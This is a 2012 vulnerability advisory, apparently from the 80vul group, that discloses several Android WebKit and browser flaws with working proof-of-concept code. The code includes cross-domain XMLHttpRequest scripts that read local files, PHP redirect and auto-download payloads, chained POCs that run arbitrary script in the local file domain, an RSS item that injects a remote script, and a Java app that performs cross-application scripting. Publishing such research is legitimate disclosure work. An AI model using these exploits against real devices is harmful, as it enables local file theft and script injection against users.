Android Webkit XSS / Cross Domain Issues

`Android Multiple Vulnerabilities  
  
Author: www.80vul.com [Email:5up3rh3i#gmail.com]  
Release Date: 2012/2/8  
References: http://www.80vul.com/android/android-0days.txt  
  
  
Ph4nt0m Webzine 0x06 has been  
released[http://www.80vul.com/webzine_0x06/],there  
three papers on the android application security about the development  
environment,browser security, inter-application communication.And published  
a lot of 0days:  
  
[0day-NO.0] android-webkit local cross-domain vulnerability  
  
android-webkit allow local html files cross any http domain and the local  
file.demo:  
  
<script>  
var request = false;  
if(window.XMLHttpRequest) {  
request = new XMLHttpRequest();  
if(request.overrideMimeType) {  
request.overrideMimeType('text/xml');  
}  
} else if(window.ActiveXObject) {  
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',  
'Microsoft.XMLHTTP',  
'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',  
'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];  
for(var i=0; i<versions.length; i++) {  
try {  
request = new ActiveXObject(versions[i]);  
} catch(e) {}  
}  
}  
  
xmlhttp=request;  
  
//xmlhttp.open("GET", "file://///default.prop", false);  
//xmlhttp.open("GET", "http://www.80vul.com/", false);  
xmlhttp.send(null);  
var ret = xmlhttp.responseText;  
  
alert(ret);  
</script>  
  
[0day-NO.1] android-webkit cross-protocol vulnerability  
  
this vul allow cross to the file protocol from http. demo:  
  
<iframe name=f src="location.php" ></iframe>  
<script>  
function init(){  
f.location = "file:///default.prop";  
}  
setTimeout(init,5000)  
</script>  
  
location.php codz:  
<?php  
header("Location:file:///80vul.com");  
?>  
  
[0day-NO.2] android-webkit file:// protocol xss vulnerability  
  
ON android-webkit File:// protocol, the lack of filtering on the directory  
and file name,Lead to cross-site scripting attacks. demo:  
  
visit this : file:///80vul.com/<script>alert(1);</script>  
  
[0day-NO.3] android-browser/firefox auto download the file vulnerability  
  
android-browser/firefox Handle the Content-Disposition: attachment, lack of  
safety tips.So through this vul allows users to automatically download the  
evil html file to the local directory.  
  
test this code:  
  
<?  
//autodown.php  
header("Content-Disposition: attachment:filename=autodown.htm");  
$data=<<<android_xss_go  
<script>alert(/xss/);</script>  
android_xss_go;  
print $data;  
?>  
  
the local file name and the path:  
  
android 1.x --> /sdcard/download/autodown.html  
android 2.x-3.x --> /sdcard/download/autodown.htm  
android 4.0 --> /sdcard/download/autodown.php  
firefox --> /sdcard/download/autodown.php  
  
So,Let's play a jigsaw puzzle:  
  
POC[1]:  
//[0day-NO.1]+[0day-NO.2]  
<iframe name=f src="location.php" ></iframe>  
<script>  
function init(){  
f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";  
}  
setTimeout(init,5000)  
</script>  
  
POC[2]:  
//[0day-NO.1]+[0day-NO.3]  
<meta http-equiv="refresh" content="0;URL=autodown.php"/>  
<iframe name=f src="location.php" ></iframe>  
<script>  
function init(){  
f.location = "file:///sdcard/Download/autodown.htm";  
}  
setTimeout(init,5000)  
</script>  
  
Now ,We can execute arbitrary js code on the local domain, and we can cross  
any http domain and the local file used [0day-NO.0].  
  
and go on ...  
  
[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability  
  
By controlling the second argument of webview.loadDataWithBaseURL(),can  
cross the file:// protocol use javascript,like  
<script>window.location='file://///default.prop';</script> .so the dome apk  
demo:  
  
WebView webview;  
webview = (WebView) findViewById(R.id.webview);  
webview.getSettings().setJavaScriptEnabled(true);  
webview.setWebChromeClient(new WebChromeClient());  
String  
data="80vul<script>window.location='file://///default.prop';</script>";  
webview.loadDataWithBaseURL("http://www.baidu.com/", data,  
"text/html", "utf-8", null);  
  
  
[0day-NO.5] com.htc.googlereader XSS vulnerability  
  
com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on  
this app, then Decompilation and Found this codz:  
  
label399: String str = this.mHeadlineShown.getSummary();  
if (str.trim().contains("<iframe"))  
{  
this.mWebView.loadData(str, "text/html", "utf-8");  
break label246;  
}  
this.mWebView.loadDataWithBaseURL("http://", str, "text/html",  
"utf-8", null);  
break label246;  
  
the "str" have no filter and can be controlled by evil RSS:  
  
  
<item>  
<guid>http://www.80vul.com</guid>  
<title>0day-NO.5</title>  
<link>http://www.80vul.com</link>  
<description><![CDATA[aa<script src='  
http://www.80vul.com/xss.js'></script>]]></description>  
<dc:creator>80vul</dc:creator>  
<category>anddoid</category>  
<pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>  
</item>  
  
When opens the unread status of the rss, u can get the XSS vul. and this  
is mWebView.loadDataWithBaseURL(),so can cross file:// by [0day-NO.4].  
  
  
[0day-NO.6] Some Browsers for android Cross-Application Scripting  
Vulnerability  
  
the evil app can cross browser and execute arbitrary js code on the local  
domain. the demo app codz:  
  
//codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf  
package com.x;  
//opera  
//com.opera.browser com.opera.Opera  
  
//firefox  
//org.mozilla.firefox org.mozilla.firefox.App  
  
//android  
//com.android.browser com.android.browser.BrowserActivity  
  
import android.app.Activity;  
import android.content.ComponentName;  
import android.content.Intent;  
import android.net.Uri;  
import android.os.Bundle;  
  
public class TesttestActivity extends Activity {  
static final String mPackage = "com.android.browser";  
static final String mClass = "com.android.browser.BrowserActivity";  
static final String gomPackage = "com.opera.browser";  
static final String gomClass = "com.opera.Opera";  
static final String mUrl = "http://www.80vul.com/autodown.php";  
static final int mSleep = 15000;  
@Override  
public void onCreate(Bundle savedInstanceState) {  
super.onCreate(savedInstanceState);  
setContentView(R.layout.main);  
startBrowserActivity(mUrl);  
try {  
Thread.sleep(mSleep);  
}  
catch (InterruptedException e) {}  
startBrowserActivitygo("file:///sdcard/Download/g.htm");  
}  
private void startBrowserActivity(String url) {  
Intent res = new Intent("android.intent.action.VIEW");  
res.setComponent(new ComponentName(mPackage,mClass));  
res.setData(Uri.parse(url));  
startActivity(res);  
}  
private void startBrowserActivitygo(String url) {  
Intent res = new Intent("android.intent.action.VIEW");  
res.setComponent(new ComponentName(gomPackage,gomClass));  
res.setData(Uri.parse(url));  
startActivity(res);  
}  
}  
  
hitest  
`